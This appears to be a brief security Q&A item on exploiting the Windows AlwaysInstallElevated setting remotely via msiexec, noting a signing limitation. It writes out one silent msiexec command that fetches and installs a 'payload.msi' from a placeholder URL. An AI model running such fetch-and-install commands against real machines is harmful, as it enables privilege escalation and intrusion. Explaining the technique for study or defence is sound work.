Can AlwaysInstallElevated be exploited remotely via msiexec, and what are the limitations?

Msiexec supports remote download and execution using a URL (e.g., `msiexec /q /i https://example.com/payload.msi`), but attempting this with an untrusted MSI file will fail because the installer treats the source as untrusted. The file must be signed with a trusted certificate to perform a remote exploitation using AlwaysInstallElevated. This limitation is discussed in the extended approaches section of Test Analysis of Privilege Escalation Using AlwaysInstallElevated.